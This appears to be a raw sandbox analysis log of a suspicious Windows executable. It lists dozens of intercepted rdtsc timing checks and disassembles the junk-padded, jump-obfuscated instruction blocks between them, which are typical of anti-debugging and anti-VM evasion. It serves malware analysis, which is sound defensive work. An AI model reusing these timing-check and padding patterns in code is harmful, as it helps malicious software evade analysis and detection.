Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ABF400 second address: ABF418 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFA692CA41Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ABF418 second address: ABF427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFA68B945B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ABF427 second address: ABF42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AC9153 second address: AC9159 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ACF53B second address: ACF53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ACF53F second address: ACF553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BAh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ACF553 second address: ACF559 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD1A2A second address: AD1A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FFA68B945B6h 0x0000000c jl 00007FFA68B945B6h 0x00000012 popad 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 pushad 0x00000018 jnc 00007FFA68B945B6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD1612 second address: AD161A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD161A second address: AD1636 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jbe 00007FFA68B945B6h 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FFA68B945D5h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD1636 second address: AD165B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA429h 0x00000009 jc 00007FFA692CA418h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD165B second address: AD1661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD63B2 second address: AD63B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD63B7 second address: AD63DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FFA68B945C9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AD63DB second address: AD63EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: ADE1AC second address: ADE1D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FFA68B945BBh 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FFA68B945BDh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AE569E second address: AE56A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AE56A3 second address: AE56BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AE56BB second address: AE56BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AE6D6D second address: AE6D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 9FB76D second address: 9FB77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA41Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 9FB77F second address: 9FB785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 9FB785 second address: 9FB78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE439 second address: AEE43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9B5 second address: AEE9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA41Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9C7 second address: AEE9CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9CD second address: AEE9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9DA second address: AEE9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9E5 second address: AEE9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9EB second address: AEE9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jng 00007FFA68B945B6h 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEEB96 second address: AEEBDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA692CA423h 0x00000008 jo 00007FFA692CA416h 0x0000000e jmp 00007FFA692CA41Fh 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FFA692CA424h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AF242A second address: AF2439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFA68B945B6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B2B616 second address: B2B61A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B2B61A second address: B2B63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA68B945C0h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B2B63A second address: B2B63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B2B63E second address: B2B642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B3DAEC second address: B3DB1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FFA692CA41Eh 0x0000000f jne 00007FFA692CA41Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B3DB1B second address: B3DB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B3DB1F second address: B3DB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C05BDD second address: C05BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007FFA68B945B6h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C04C47 second address: C04C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C04C4B second address: C04C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFA68B945B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFA68B945C7h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C04F4C second address: C04F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA420h 0x00000007 jno 00007FFA692CA416h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FFA692CA41Bh 0x00000014 push ebx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C052D3 second address: C052F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FFA68B945BCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C05464 second address: C0548F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFA692CA41Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnp 00007FFA692CA433h 0x00000012 jmp 00007FFA692CA427h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0586F second address: C05893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFA68B945C9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C05893 second address: C05897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C08A02 second address: C08A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B4D0 second address: C0B4D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B4D6 second address: C0B4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B890 second address: C0B897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B897 second address: C0B8B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FFA68B945B6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B8B6 second address: C0B8BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B8BC second address: C0B8D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA68B945C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B8D9 second address: C0B8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FFA692CA418h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CC73 second address: C0CC77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CC77 second address: C0CC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA427h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CC94 second address: C0CC9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FFA68B945B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CC9E second address: C0CCA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CCA8 second address: C0CCAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CCAC second address: C0CCB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0007E second address: 6F000A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, E5ABh 0x0000000a popad 0x0000000b sub esp, 18h 0x0000000e jmp 00007FFA68B945BEh 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov dx, ax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F000A1 second address: 6F00170 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FFA692CA424h 0x0000000d sub ecx, 787F0998h 0x00000013 jmp 00007FFA692CA41Bh 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007FFA692CA429h 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push ecx 0x00000023 mov eax, ebx 0x00000025 pop edx 0x00000026 call 00007FFA692CA424h 0x0000002b pushfd 0x0000002c jmp 00007FFA692CA422h 0x00000031 xor cx, BD88h 0x00000036 jmp 00007FFA692CA41Bh 0x0000003b popfd 0x0000003c pop esi 0x0000003d popad 0x0000003e mov ebx, dword ptr [eax+10h] 0x00000041 pushad 0x00000042 mov dl, 98h 0x00000044 pushad 0x00000045 movzx ecx, dx 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b popad 0x0000004c push esi 0x0000004d pushad 0x0000004e pushfd 0x0000004f jmp 00007FFA692CA420h 0x00000054 add cx, D318h 0x00000059 jmp 00007FFA692CA41Bh 0x0000005e popfd 0x0000005f push ecx 0x00000060 pop eax 0x00000061 popad 0x00000062 mov dword ptr [esp], esi 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FFA692CA41Ch 0x0000006c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00170 second address: 6F001E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA68B945C1h 0x00000009 adc ecx, 0940FF66h 0x0000000f jmp 00007FFA68B945C1h 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov esi, dword ptr [759B06ECh] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FFA68B945C8h 0x00000028 sub cl, 00000038h 0x0000002b jmp 00007FFA68B945BBh 0x00000030 popfd 0x00000031 mov ah, A0h 0x00000033 popad 0x00000034 test esi, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FFA68B945BEh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F001E7 second address: 6F002C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FFA692CB2FFh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FFA692CA424h 0x00000016 sbb ecx, 5F4946F8h 0x0000001c jmp 00007FFA692CA41Bh 0x00000021 popfd 0x00000022 mov ecx, 51EBD42Fh 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 jmp 00007FFA692CA422h 0x0000002e push eax 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FFA692CA421h 0x00000036 and eax, 6712AE46h 0x0000003c jmp 00007FFA692CA421h 0x00000041 popfd 0x00000042 movzx ecx, bx 0x00000045 popad 0x00000046 xchg eax, edi 0x00000047 jmp 00007FFA692CA423h 0x0000004c call dword ptr [75980B60h] 0x00000052 mov eax, 75F3E5E0h 0x00000057 ret 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007FFA692CA41Bh 0x00000061 xor ecx, 1D73EA2Eh 0x00000067 jmp 00007FFA692CA429h 0x0000006c popfd 0x0000006d jmp 00007FFA692CA420h 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F002C7 second address: 6F0033D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b jmp 00007FFA68B945C6h 0x00000010 pop edi 0x00000011 pushad 0x00000012 jmp 00007FFA68B945BEh 0x00000017 push esi 0x00000018 push ebx 0x00000019 pop esi 0x0000001a pop edi 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d pushad 0x0000001e mov ebx, ecx 0x00000020 pushfd 0x00000021 jmp 00007FFA68B945C2h 0x00000026 adc eax, 66342F98h 0x0000002c jmp 00007FFA68B945BBh 0x00000031 popfd 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FFA68B945BBh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0033D second address: 6F0035A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA429h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0035A second address: 6F003EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov si, F0B3h 0x0000000f call 00007FFA68B945C8h 0x00000014 pushfd 0x00000015 jmp 00007FFA68B945C2h 0x0000001a jmp 00007FFA68B945C5h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 push dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FFA68B945C8h 0x0000002d sbb ax, E378h 0x00000032 jmp 00007FFA68B945BBh 0x00000037 popfd 0x00000038 mov dl, ah 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F003EA second address: 6F003FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA421h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F004DB second address: 6F004E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F004E1 second address: 6F004E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F004E5 second address: 6F00537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e jmp 00007FFA68B945C7h 0x00000013 popad 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 je 00007FFAD75C374Fh 0x0000001e jmp 00007FFA68B945C2h 0x00000023 sub eax, eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FFA68B945BCh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00537 second address: 6F0053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0053D second address: 6F0055A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi], edi 0x0000000d pushad 0x0000000e mov cx, DB23h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0055A second address: 6F0065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, 8Bh 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b jmp 00007FFA692CA427h 0x00000010 mov dword ptr [esi+08h], eax 0x00000013 pushad 0x00000014 jmp 00007FFA692CA424h 0x00000019 jmp 00007FFA692CA422h 0x0000001e popad 0x0000001f mov dword ptr [esi+0Ch], eax 0x00000022 jmp 00007FFA692CA420h 0x00000027 mov eax, dword ptr [ebx+4Ch] 0x0000002a pushad 0x0000002b mov esi, 24CF1B7Dh 0x00000030 mov cx, F279h 0x00000034 popad 0x00000035 mov dword ptr [esi+10h], eax 0x00000038 jmp 00007FFA692CA424h 0x0000003d mov eax, dword ptr [ebx+50h] 0x00000040 jmp 00007FFA692CA420h 0x00000045 mov dword ptr [esi+14h], eax 0x00000048 jmp 00007FFA692CA420h 0x0000004d mov eax, dword ptr [ebx+54h] 0x00000050 jmp 00007FFA692CA420h 0x00000055 mov dword ptr [esi+18h], eax 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007FFA692CA41Dh 0x0000005f and al, 00000006h 0x00000062 jmp 00007FFA692CA421h 0x00000067 popfd 0x00000068 popad 0x00000069 mov eax, dword ptr [ebx+58h] 0x0000006c jmp 00007FFA692CA41Eh 0x00000071 mov dword ptr [esi+1Ch], eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 popad 0x0000007a rdtsc
